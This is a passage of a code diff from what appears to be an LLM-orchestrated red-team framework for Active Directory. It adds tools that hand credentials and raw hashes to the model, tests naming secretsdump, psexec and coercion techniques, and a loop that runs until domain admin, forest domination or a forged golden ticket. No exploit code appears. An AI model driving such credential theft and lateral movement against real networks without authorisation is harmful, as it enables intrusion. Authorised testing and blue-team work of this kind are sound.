+            let op_id = self.state.read().await.operation_id.clone();
+            let mut conn = queue.connection();
+            if let Err(e) = ares_core::token_usage::increment_token_usage(
+                &mut conn,
+                &op_id,
+                usage.input_tokens.into(),
+                usage.output_tokens.into(),
+                model,
+            )
+            .await
+            {
+                warn!(err = %e, "Failed to record incremental token usage");
+            }
+        }
+    }
+}
diff --git a/ares-cli/src/orchestrator/callback_handler/query.rs b/ares-cli/src/orchestrator/callback_handler/query.rs
new file mode 100644
index 00000000..acd83112
--- /dev/null
+++ b/ares-cli/src/orchestrator/callback_handler/query.rs
@@ -0,0 +1,318 @@
+//! Query tools — read from in-memory state.
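+//!
+//! Each tool returns `CallbackResult::Continue` wrapping pretty-printed JSON
+//! for the LLM to read. As a hypothetical example, `get_credential_summary`
+//! against a state holding two contoso.local credentials (one admin) yields
+//! something like (field order may vary):
+//!
+//! ```text
+//! {
+//!   "by_domain": [{"domain": "contoso.local", "total": 2, "admin": 1}],
+//!   "has_domain_admin": false,
+//!   "total_credentials": 2
+//! }
+//! ```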
+ +use std::collections::HashMap; + +use anyhow::Result; +use serde_json::json; + +use ares_llm::provider::ToolCall; +use ares_llm::CallbackResult; + +use super::OrchestratorCallbackHandler; + +impl OrchestratorCallbackHandler { + pub(super) async fn get_credential_summary(&self) -> Result { + let state = self.state.read().await; + let mut by_domain: HashMap<&str, (usize, usize)> = HashMap::new(); + + for cred in &state.credentials { + let domain = if cred.domain.is_empty() { + "unknown" + } else { + &cred.domain + }; + let entry = by_domain.entry(domain).or_insert((0, 0)); + entry.0 += 1; + if cred.is_admin { + entry.1 += 1; + } + } + + let summary: Vec = by_domain + .iter() + .map(|(domain, (total, admin))| { + json!({ + "domain": domain, + "total": total, + "admin": admin, + }) + }) + .collect(); + + let result = json!({ + "total_credentials": state.credentials.len(), + "by_domain": summary, + "has_domain_admin": state.has_domain_admin, + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_hash_summary(&self) -> Result { + let state = self.state.read().await; + let mut by_type: HashMap<&str, (usize, usize)> = HashMap::new(); + + for hash in &state.hashes { + let entry = by_type.entry(&hash.hash_type).or_insert((0, 0)); + entry.0 += 1; + if hash.cracked_password.is_some() { + entry.1 += 1; + } + } + + let summary: Vec = by_type + .iter() + .map(|(hash_type, (total, cracked))| { + json!({ + "hash_type": hash_type, + "total": total, + "cracked": cracked, + "uncracked": total - cracked, + }) + }) + .collect(); + + let result = json!({ + "total_hashes": state.hashes.len(), + "by_type": summary, + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_all_credentials(&self, call: &ToolCall) -> Result { + let limit = call.arguments["limit"].as_u64().unwrap_or(30) as usize; + let offset = call.arguments["offset"].as_u64().unwrap_or(0) as usize; + + let state = self.state.read().await; + let total = state.credentials.len(); + let page: Vec = state + .credentials + .iter() + .skip(offset) + .take(limit) + .map(|c| { + json!({ + "username": c.username, + "domain": c.domain, + "has_password": !c.password.is_empty(), + "is_admin": c.is_admin, + "source": c.source, + }) + }) + .collect(); + + let result = json!({ + "credentials": page, + "total": total, + "offset": offset, + "limit": limit, + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_all_hashes(&self, call: &ToolCall) -> Result { + let limit = call.arguments["limit"].as_u64().unwrap_or(30) as usize; + let offset = call.arguments["offset"].as_u64().unwrap_or(0) as usize; + + let state = self.state.read().await; + let total = state.hashes.len(); + let page: Vec = state + .hashes + .iter() + .skip(offset) + .take(limit) + .map(|h| { + json!({ + "username": h.username, + "domain": h.domain, + "hash_type": h.hash_type, + "cracked": h.cracked_password.is_some(), + "source": h.source, + // Don't expose raw hash value to LLM — it doesn't need it + "has_aes_key": h.aes_key.is_some(), + }) + }) + .collect(); + + let result = json!({ + "hashes": page, + "total": total, + "offset": offset, + "limit": limit, + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_hash_value(&self, call: &ToolCall) -> Result { + let username = call.arguments["username"].as_str().unwrap_or(""); + let domain = 
call.arguments["domain"].as_str().unwrap_or(""); + let hash_type_filter = call.arguments["hash_type"].as_str(); + + let state = self.state.read().await; + let matches: Vec = state + .hashes + .iter() + .filter(|h| { + h.username.eq_ignore_ascii_case(username) + && (domain.is_empty() || h.domain.eq_ignore_ascii_case(domain)) + && hash_type_filter + .map(|t| h.hash_type.eq_ignore_ascii_case(t)) + .unwrap_or(true) + }) + .map(|h| { + let mut entry = json!({ + "username": h.username, + "domain": h.domain, + "hash_type": h.hash_type, + "hash_value": h.hash_value, + "cracked": h.cracked_password.is_some(), + }); + if let Some(ref aes) = h.aes_key { + entry["aes_key"] = json!(aes); + } + entry + }) + .collect(); + + if matches.is_empty() { + Ok(CallbackResult::Continue(format!( + "No hashes found for {username}@{domain}" + ))) + } else { + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &matches, + )?)) + } + } + + pub(super) async fn get_pending_tasks(&self) -> Result { + let state = self.state.read().await; + let tasks: Vec = state + .pending_tasks + .values() + .map(|t| { + json!({ + "task_id": t.task_id, + "task_type": t.task_type, + "assigned_agent": t.assigned_agent, + "status": format!("{:?}", t.status), + "created_at": t.created_at.to_rfc3339(), + }) + }) + .collect(); + + let result = json!({ + "pending_tasks": tasks, + "total": tasks.len(), + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_agent_status(&self) -> Result { + let task_queue = self + .task_queue + .as_ref() + .ok_or_else(|| anyhow::anyhow!("TaskQueue not configured"))?; + // Read heartbeats from Redis to get agent status (SCAN to avoid blocking) + let mut conn = task_queue.connection(); + let pattern = "ares:heartbeat:*"; + let keys = { + let mut all_keys = Vec::new(); + let mut cursor: u64 = 0; + loop { + let result: Result<(u64, Vec), redis::RedisError> = redis::cmd("SCAN") + .arg(cursor) + .arg("MATCH") + .arg(pattern) + .arg("COUNT") + .arg(100) + .query_async(&mut conn) + .await; + match result { + Ok((next_cursor, keys)) => { + all_keys.extend(keys); + cursor = next_cursor; + if cursor == 0 { + break; + } + } + Err(_) => break, + } + } + all_keys + }; + + let mut agents: Vec = Vec::new(); + for key in &keys { + if let Ok(data) = redis::cmd("GET") + .arg(key) + .query_async::(&mut conn) + .await + { + if let Ok(parsed) = serde_json::from_str::(&data) { + agents.push(parsed); + } + } + } + + let result = json!({ + "agents": agents, + "total": agents.len(), + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } + + pub(super) async fn get_operation_summary(&self) -> Result { + let state = self.state.read().await; + + let cracked_count = state + .hashes + .iter() + .filter(|h| h.cracked_password.is_some()) + .count(); + let admin_count = state.credentials.iter().filter(|c| c.is_admin).count(); + + let result = json!({ + "operation_id": state.operation_id, + "target_ips": state.target_ips, + "domains": state.domains, + "has_domain_admin": state.has_domain_admin, + "credentials": { + "total": state.credentials.len(), + "admin": admin_count, + }, + "hashes": { + "total": state.hashes.len(), + "cracked": cracked_count, + "uncracked": state.hashes.len() - cracked_count, + }, + "hosts": state.hosts.len(), + "users": state.users.len(), + "discovered_vulnerabilities": state.discovered_vulnerabilities.len(), + "exploited_vulnerabilities": state.exploited_vulnerabilities.len(), + "pending_tasks": 
state.pending_tasks.len(), + "completed_tasks": state.completed_tasks.len(), + }); + + Ok(CallbackResult::Continue(serde_json::to_string_pretty( + &result, + )?)) + } +} diff --git a/ares-cli/src/orchestrator/callback_handler/tests.rs b/ares-cli/src/orchestrator/callback_handler/tests.rs new file mode 100644 index 00000000..97c312a4 --- /dev/null +++ b/ares-cli/src/orchestrator/callback_handler/tests.rs @@ -0,0 +1,547 @@ +use super::*; +use serde_json::json; + +use ares_llm::provider::ToolCall; +use ares_llm::CallbackResult; + +use crate::orchestrator::state::SharedState; + +/// Helper to create a credential without Default. +fn make_cred( + username: &str, + password: &str, + domain: &str, + is_admin: bool, +) -> ares_core::models::Credential { + ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.into(), + password: password.into(), + domain: domain.into(), + source: String::new(), + discovered_at: None, + is_admin, + parent_id: None, + attack_step: 0, + } +} + +/// Helper to create a hash without Default. +fn make_hash( + username: &str, + domain: &str, + hash_type: &str, + hash_value: &str, + aes_key: Option<&str>, +) -> ares_core::models::Hash { + ares_core::models::Hash { + id: uuid::Uuid::new_v4().to_string(), + username: username.into(), + hash_value: hash_value.into(), + hash_type: hash_type.into(), + domain: domain.into(), + cracked_password: None, + source: String::new(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: aes_key.map(|s| s.to_string()), + } +} + +fn make_handler() -> OrchestratorCallbackHandler { + OrchestratorCallbackHandler::new_for_test(SharedState::new("test-op".to_string())) +} + +#[tokio::test] +async fn test_credential_summary_empty() { + let handler = make_handler(); + let call = ToolCall { + id: "c1".into(), + name: "get_credential_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["total_credentials"], 0); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_credential_summary_with_data() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.credentials + .push(make_cred("admin", "pass", "contoso.local", true)); + s.credentials + .push(make_cred("user1", "pass1", "contoso.local", false)); + } + + let call = ToolCall { + id: "c2".into(), + name: "get_credential_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["total_credentials"], 2); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_hash_summary_empty() { + let handler = make_handler(); + let call = ToolCall { + id: "c3".into(), + name: "get_hash_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["total_hashes"], 0); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_hash_value_lookup() { + let handler = make_handler(); + { + let mut s = 
handler.state.write().await; + s.hashes.push(make_hash( + "krbtgt", + "contoso.local", + "NTLM", + "aad3b435b51404ee:313b6f423a71d74c", + Some("f8b6c5e4d3a2b109"), + )); + } + + let call = ToolCall { + id: "c4".into(), + name: "get_hash_value".into(), + arguments: json!({"username": "krbtgt", "domain": "contoso.local"}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + assert!(msg.contains("313b6f423a71d74c")); + assert!(msg.contains("f8b6c5e4d3a2b109")); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_hash_value_not_found() { + let handler = make_handler(); + let call = ToolCall { + id: "c5".into(), + name: "get_hash_value".into(), + arguments: json!({"username": "nobody", "domain": "contoso.local"}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => assert!(msg.contains("No hashes found")), + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_pending_tasks_empty() { + let handler = make_handler(); + let call = ToolCall { + id: "c6".into(), + name: "get_pending_tasks".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["total"], 0); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_unknown_tool_returns_none() { + let handler = make_handler(); + let call = ToolCall { + id: "c7".into(), + name: "nmap_scan".into(), + arguments: json!({}), + }; + assert!(handler.handle_callback(&call).await.is_none()); +} + +#[tokio::test] +async fn test_dispatch_without_dispatcher() { + let handler = make_handler(); + let call = ToolCall { + id: "c8".into(), + name: "dispatch_recon".into(), + arguments: json!({"target_ip": "192.168.58.10"}), + }; + let result = handler.handle_callback(&call).await.unwrap(); + assert!(result.is_err()); // No dispatcher configured +} + +#[tokio::test] +async fn test_operation_summary() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.credentials + .push(make_cred("admin", "pass", "contoso.local", true)); + s.hashes.push(make_hash( + "krbtgt", + "contoso.local", + "NTLM", + "aad3b435:313b6f42", + None, + )); + s.has_domain_admin = true; + } + + let call = ToolCall { + id: "c10".into(), + name: "get_operation_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["credentials"]["total"], 1); + assert_eq!(parsed["credentials"]["admin"], 1); + assert_eq!(parsed["hashes"]["total"], 1); + assert_eq!(parsed["has_domain_admin"], true); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_dispatch_crack_without_dispatcher() { + let handler = make_handler(); + let call = ToolCall { + id: "c11".into(), + name: "dispatch_crack".into(), + arguments: json!({"hash_value": "aad3b435:beef", "hash_type": "ntlm"}), + }; + let result = handler.handle_callback(&call).await.unwrap(); + assert!(result.is_err()); // No dispatcher configured +} + +#[tokio::test] +async fn test_all_credentials_pagination() { + 
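+    // Seeds 10 credentials, then requests limit=3/offset=2 — expecting a
+    // 3-item page (user2..user4) out of a total of 10.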
let handler = make_handler(); + { + let mut s = handler.state.write().await; + for i in 0..10 { + s.credentials.push(make_cred( + &format!("user{i}"), + "pass", + "contoso.local", + false, + )); + } + } + + let call = ToolCall { + id: "c9".into(), + name: "get_all_credentials".into(), + arguments: json!({"limit": 3, "offset": 2}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let parsed: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(parsed["total"], 10); + assert_eq!(parsed["credentials"].as_array().unwrap().len(), 3); + assert_eq!(parsed["offset"], 2); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_full_summary_with_populated_state() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.credentials + .push(make_cred("admin", "P@ss1", "contoso.local", true)); + s.credentials + .push(make_cred("user1", "pass1", "contoso.local", false)); + s.credentials + .push(make_cred("svc_sql", "SqlP@ss", "fabrikam.local", false)); + s.hashes.push(make_hash( + "krbtgt", + "contoso.local", + "NTLM", + "aad3b:beef", + None, + )); + let mut h = make_hash("admin", "contoso.local", "NTLM", "aad3b:dead", None); + h.cracked_password = Some("cracked123".into()); + s.hashes.push(h); + s.has_domain_admin = true; + s.domains.push("contoso.local".into()); + s.discovered_vulnerabilities.insert( + "vuln-1".into(), + ares_core::models::VulnerabilityInfo { + vuln_id: "vuln-1".into(), + vuln_type: "constrained_delegation".into(), + target: "192.168.58.30".into(), + discovered_by: "test".into(), + discovered_at: chrono::Utc::now(), + details: { + let mut m = std::collections::HashMap::new(); + m.insert("account".into(), json!("svc_sql")); + m + }, + recommended_agent: String::new(), + priority: 5, + }, + ); + } + + let call = ToolCall { + id: "int-1".into(), + name: "get_operation_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(p["credentials"]["total"], 3); + assert_eq!(p["credentials"]["admin"], 1); + assert_eq!(p["hashes"]["total"], 2); + assert_eq!(p["hashes"]["cracked"], 1); + assert_eq!(p["has_domain_admin"], true); + assert_eq!(p["discovered_vulnerabilities"], 1); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_credential_summary_multi_domain() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.credentials + .push(make_cred("admin", "p1", "contoso.local", true)); + s.credentials + .push(make_cred("user1", "p2", "contoso.local", false)); + s.credentials + .push(make_cred("admin2", "p3", "fabrikam.local", true)); + } + + let call = ToolCall { + id: "int-2".into(), + name: "get_credential_summary".into(), + arguments: json!({}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(p["total_credentials"], 3); + let domains = p["by_domain"].as_array().unwrap(); + assert_eq!(domains.len(), 2); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_hash_value_case_insensitive_lookup() { + let handler = make_handler(); + { + let mut s = 
handler.state.write().await; + s.hashes.push(make_hash( + "Administrator", + "CONTOSO.LOCAL", + "NTLM", + "beef:dead", + None, + )); + } + + let call = ToolCall { + id: "int-3".into(), + name: "get_hash_value".into(), + arguments: json!({"username": "administrator", "domain": "contoso.local"}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => assert!(msg.contains("beef:dead")), + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_hash_value_filter_by_type() { + let handler = make_handler(); + { + let mut s = handler.state.write().await; + s.hashes.push(make_hash( + "admin", + "contoso.local", + "NTLM", + "ntlm_hash", + None, + )); + s.hashes.push(make_hash( + "admin", + "contoso.local", + "aes256", + "aes_hash", + None, + )); + } + + let call = ToolCall { + id: "int-4".into(), + name: "get_hash_value".into(), + arguments: json!({"username": "admin", "domain": "contoso.local", "hash_type": "aes256"}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + assert!(msg.contains("aes_hash")); + assert!(!msg.contains("ntlm_hash")); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} + +#[tokio::test] +async fn test_all_dispatch_tools_fail_without_dispatcher() { + let handler = make_handler(); + let dispatch_tools = [ + ("dispatch_recon", json!({"target_ip": "192.168.58.10"})), + ( + "dispatch_credential_access", + json!({"technique": "secretsdump", "target_ip": "x", "domain": "x", "username": "x", "password": "x"}), + ), + ( + "dispatch_lateral_movement", + json!({"target_ip": "x", "technique": "psexec", "username": "x", "password": "x", "domain": "x"}), + ), + ("dispatch_privesc_exploit", json!({"vuln_id": "v-1"})), + ( + "dispatch_coercion", + json!({"target_ip": "x", "listener_ip": "x"}), + ), + ( + "dispatch_crack", + json!({"hash_value": "aad3b:beef", "hash_type": "ntlm"}), + ), + ]; + + for (tool, args) in &dispatch_tools { + let call = ToolCall { + id: format!("disp-{tool}"), + name: tool.to_string(), + arguments: args.clone(), + }; + let result = handler.handle_callback(&call).await; + assert!(result.is_some(), "Should recognize: {tool}"); + assert!( + result.unwrap().is_err(), + "Should error without dispatcher: {tool}" + ); + } +} + +#[tokio::test] +async fn test_all_callback_tools_recognized() { + let handler = make_handler(); + let tools = [ + "get_credential_summary", + "get_hash_summary", + "get_all_credentials", + "get_all_hashes", + "get_hash_value", + "get_pending_tasks", + "get_operation_summary", + "dispatch_recon", + "dispatch_credential_access", + "dispatch_lateral_movement", + "dispatch_privesc_exploit", + "dispatch_coercion", + "dispatch_crack", + ]; + + for tool in &tools { + let call = ToolCall { + id: format!("route-{tool}"), + name: tool.to_string(), + arguments: json!({"username": "x", "domain": "x", "target_ip": "x", + "technique": "x", "password": "x", "hash_value": "x", + "hash_type": "x", "vuln_id": "x", "listener_ip": "x"}), + }; + assert!( + handler.handle_callback(&call).await.is_some(), + "Handler should recognize: {tool}" + ); + } + + // Unknown tool returns None + let call = ToolCall { + id: "route-unknown".into(), + name: "nmap_scan".into(), + arguments: json!({}), + }; + assert!(handler.handle_callback(&call).await.is_none()); +} + +#[tokio::test] +async fn test_all_hashes_pagination_large() { + let handler = make_handler(); + { + let mut s 
= handler.state.write().await; + for i in 0..50 { + s.hashes.push(make_hash( + &format!("user{i}"), + "contoso.local", + "NTLM", + &format!("hash_{i}"), + None, + )); + } + } + + let call = ToolCall { + id: "int-pg".into(), + name: "get_all_hashes".into(), + arguments: json!({"limit": 10, "offset": 40}), + }; + let result = handler.handle_callback(&call).await.unwrap().unwrap(); + match result { + CallbackResult::Continue(msg) => { + let p: serde_json::Value = serde_json::from_str(&msg).unwrap(); + assert_eq!(p["total"], 50); + assert_eq!(p["hashes"].as_array().unwrap().len(), 10); + } + other => panic!("Expected Continue, got: {:?}", other), + } +} diff --git a/ares-cli/src/orchestrator/completion.rs b/ares-cli/src/orchestrator/completion.rs new file mode 100644 index 00000000..8a54c36e --- /dev/null +++ b/ares-cli/src/orchestrator/completion.rs @@ -0,0 +1,492 @@ +//! Completion and golden-ticket wait loops. +//! +//! These functions block (async) until the operation reaches a terminal state: +//! all forests dominated, golden tickets forged, max runtime exceeded, or +//! explicit shutdown. +//! +//! Two config flags control early-exit behaviour (mutually exclusive): +//! - `stop_on_domain_admin`: stop as soon as DA is achieved on any domain, +//! without waiting for all trusted forests to be dominated. +//! - `stop_on_golden_ticket`: continue past DA to forge a golden ticket with +//! ExtraSid for child→parent escalation, then stop once forged. + +use std::collections::HashSet; +use std::sync::Arc; +use std::time::Duration; + +use chrono::Utc; +use redis::AsyncCommands; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::SharedState; + +/// Pure computation: given state fields, return undominated forest root domains. +/// +/// Used by both the async `undominated_forests()` and `SharedState::snapshot()`. +pub fn compute_undominated_forests( + target_domain: Option<&str>, + first_domain: Option<&str>, + trusted_domains: &std::collections::HashMap, + dominated_domains: &HashSet, +) -> Vec { + let mut required_forests: HashSet = HashSet::new(); + + if let Some(td) = target_domain { + if !td.is_empty() { + required_forests.insert(forest_root_of(td)); + } + } + if let Some(fd) = first_domain { + required_forests.insert(forest_root_of(fd)); + } + + for trust in trusted_domains.values() { + if trust.is_cross_forest() { + required_forests.insert(forest_root_of(&trust.domain)); + } + } + + if required_forests.is_empty() { + return Vec::new(); + } + + let dominated_roots: HashSet = dominated_domains + .iter() + .map(|d| forest_root_of(d)) + .collect(); + + required_forests + .difference(&dominated_roots) + .cloned() + .collect() +} + +/// Check if all trusted forests have been dominated. +/// +/// Returns a list of forest root domains that still need krbtgt hashes. +/// An empty list means all forests are dominated. +/// +/// This mirrors Python's `all_forests_dominated()` which checks that +/// krbtgt hashes are obtained from every trusted forest, not just the +/// initial target domain. +pub async fn undominated_forests(state: &SharedState) -> Vec { + let inner = state.read().await; + compute_undominated_forests( + inner.target.as_ref().map(|t| t.domain.as_str()), + inner.domains.first().map(|d| d.as_str()), + &inner.trusted_domains, + &inner.dominated_domains, + ) +} + +/// Extract forest root from a domain FQDN. 
+/// +/// For `north.contoso.local` → `contoso.local` +/// For `contoso.local` → `contoso.local` +fn forest_root_of(domain: &str) -> String { + let lower = domain.to_lowercase(); + let parts: Vec<&str> = lower.split('.').collect(); + if parts.len() <= 2 { + lower + } else { + // Walk up to find the 2-part root (assumes .local/.com TLD) + parts[parts.len() - 2..].join(".") + } +} + +/// Main operation completion loop. +/// +/// Polls every `interval` checking for: +/// - All forests dominated (krbtgt from every trusted forest) +/// - `completed` flag set (external completion signal) +/// - Max runtime exceeded +/// +/// Behaviour is influenced by two mutually exclusive config flags: +/// - `stop_on_domain_admin`: stop as soon as DA is achieved on *any* domain, +/// without waiting for forests or golden tickets. +/// - `stop_on_golden_ticket`: continue past DA to forge a golden ticket with +/// ExtraSid, then stop. If the ticket isn't forged within 60 s of DA, stop +/// anyway. +/// +/// When neither flag is set (default), the operation continues until all +/// trusted forests are dominated or max runtime is exceeded. +pub async fn wait_for_completion( + state: &SharedState, + dispatcher: &Arc, + mut shutdown_rx: watch::Receiver, + max_runtime: Duration, + interval: Duration, +) { + let start = tokio::time::Instant::now(); + + // Read stop-condition flags from config (default: both false) + let (stop_on_da, stop_on_gt) = dispatcher + .ares_config + .as_ref() + .map(|c| { + ( + c.operation.stop_on_domain_admin, + c.operation.stop_on_golden_ticket, + ) + }) + .unwrap_or((false, false)); + + info!( + max_runtime_secs = max_runtime.as_secs(), + stop_on_domain_admin = stop_on_da, + stop_on_golden_ticket = stop_on_gt, + "Completion monitor started" + ); + + loop { + // Check shutdown + if *shutdown_rx.borrow() { + info!("Completion monitor interrupted by shutdown"); + return; + } + + let elapsed = start.elapsed(); + let (has_da, has_gt, completed) = { + let inner = state.read().await; + ( + inner.has_domain_admin, + inner.has_golden_ticket, + inner.completed, + ) + }; + + // Check completion conditions. + // + // Priority order matches Python's _wait_for_completion(): + // 1. External completed flag (e.g. CLI stop signal) + // 2. Max runtime exceeded + // 3. stop_on_domain_admin: stop immediately on DA + // 4. stop_on_golden_ticket: stop when DA + golden ticket achieved + // 5. Default: stop when all trusted forests are dominated + let reason = if completed { + Some("operation marked completed") + } else if elapsed >= max_runtime { + Some("max runtime exceeded") + } else if has_da { + if stop_on_da { + // Config says stop immediately on DA — skip forest check + Some("domain admin achieved (stop_on_domain_admin)") + } else if stop_on_gt { + // stop_on_golden_ticket: keep running until GT is forged. + // Do NOT fall through to the "all forests dominated" default + // path — that would exit without the golden ticket. 
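+                //
+                // Net effect of the has_da arms, summarised:
+                //   stop_on_da          → stop immediately
+                //   stop_on_gt, has_gt  → stop (ticket forged)
+                //   stop_on_gt, !has_gt → keep polling
+                //   neither flag        → stop once no undominated forests remain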
+ if has_gt { + Some("golden ticket forged (stop_on_golden_ticket)") + } else { + None // Continue — waiting for golden ticket + } + } else { + // Default: continue until all forests are dominated + let remaining = undominated_forests(state).await; + if remaining.is_empty() { + Some("all forests dominated") + } else { + debug!( + undominated = ?remaining, + "DA achieved but forests remain undominated" + ); + None // Continue — other forests still need krbtgt + } + } + } else { + None + }; + + if let Some(reason) = reason { + info!( + reason = reason, + elapsed_secs = elapsed.as_secs(), + has_domain_admin = has_da, + has_golden_ticket = has_gt, + "Completion condition met" + ); + + // When blue team is enabled, auto-submit an investigation from the + // operation state if none have been submitted yet, then wait for all + // investigations to drain before signalling stop. + // Cap at 20 minutes to avoid hanging forever if an investigation is stuck. + if std::env::var("ARES_BLUE_ENABLED").as_deref() == Ok("1") { + info!("Blue team enabled — waiting for investigations to finish before shutdown"); + let mut conn = dispatcher.queue.connection(); + + // Check if any blue investigations already exist for this operation. + // If not, auto-submit one so blue always gets at least one run. + let op_inv_key = format!( + "ares:blue:op:{}:investigations", + dispatcher.config.operation_id + ); + let existing: i64 = redis::cmd("SCARD") + .arg(&op_inv_key) + .query_async(&mut conn) + .await + .unwrap_or(0); + if existing == 0 { + info!("No blue investigations found — auto-submitting from operation state"); + if let Err(e) = + auto_submit_blue_investigation(state, dispatcher, &mut conn).await + { + warn!(err = %e, "Failed to auto-submit blue investigation"); + } + } + let blue_deadline = tokio::time::Instant::now() + Duration::from_secs(1200); + loop { + if *shutdown_rx.borrow() { + info!("Completion monitor interrupted by shutdown while waiting for blue"); + break; + } + + if tokio::time::Instant::now() >= blue_deadline { + warn!("Blue team wait deadline reached (20m) — proceeding with shutdown"); + break; + } + + let active: i64 = redis::cmd("SCARD") + .arg(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS) + .query_async(&mut conn) + .await + .unwrap_or(0); + let queued: i64 = redis::cmd("LLEN") + .arg("ares:blue:investigations") + .query_async(&mut conn) + .await + .unwrap_or(0); + + if active == 0 && queued == 0 { + info!("All blue investigations finished"); + break; + } + + info!( + active_investigations = active, + queued_investigations = queued, + "Waiting for blue team to finish..." + ); + + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(10)) => {} + _ = shutdown_rx.changed() => { + if *shutdown_rx.borrow() { + break; + } + } + } + } + } + + // Signal the main loop to stop via Redis so it breaks out of its + // select! within the next 5-second poll cycle. + { + let mut conn = dispatcher.queue.connection(); + if let Err(e) = ares_core::state::request_stop_operation( + &mut conn, + &dispatcher.config.operation_id, + ) + .await + { + warn!(err = %e, "Failed to set Redis stop signal from completion monitor"); + } + } + + // Extend the lock one final time before returning + if let Err(e) = dispatcher.extend_lock().await { + warn!(err = %e, "Failed to extend lock during completion"); + } + + return; + } + + // Sleep until next check or shutdown + tokio::select! 
{ + _ = tokio::time::sleep(interval) => {} + _ = shutdown_rx.changed() => { + if *shutdown_rx.borrow() { + info!("Completion monitor interrupted by shutdown"); + return; + } + } + } + } +} + +/// Auto-submit a blue team investigation from the current red team operation state. +/// +/// Mirrors the logic in `ares-cli/src/blue/submit.rs::blue_from_operation()` but +/// runs inline within the orchestrator process so blue always gets at least one +/// investigation even when the red operation completes before blue's first poll. +async fn auto_submit_blue_investigation( + state: &SharedState, + dispatcher: &Arc, + conn: &mut redis::aio::ConnectionManager, +) -> Result<(), anyhow::Error> { + let op_id = &dispatcher.config.operation_id; + let now = Utc::now(); + let inv_id = format!("inv-{}", now.format("%Y%m%d-%H%M%S")); + + // Read state snapshot for building the synthetic alert + let (target_domain, target_env, cred_count, host_count, vuln_count, has_da, target_ips) = { + let inner = state.read().await; + let domain = inner + .target + .as_ref() + .map(|t| t.domain.clone()) + .unwrap_or_default(); + let env = inner + .target + .as_ref() + .map(|t| t.environment.clone()) + .unwrap_or_default(); + let ips: Vec = inner.hosts.iter().map(|h| h.ip.clone()).collect(); + ( + domain, + env, + inner.credentials.len(), + inner.hosts.len(), + inner.discovered_vulnerabilities.len(), + inner.has_domain_admin, + ips, + ) + }; + + // Collect attack techniques from Redis + let techniques_key = format!("ares:op:{op_id}:techniques"); + let techniques: Vec = redis::cmd("SMEMBERS") + .arg(&techniques_key) + .query_async(conn) + .await + .unwrap_or_default(); + + let operation_context = serde_json::json!({ + "operation_id": op_id, + "attack_window_start": now.to_rfc3339(), + "attack_window_end": 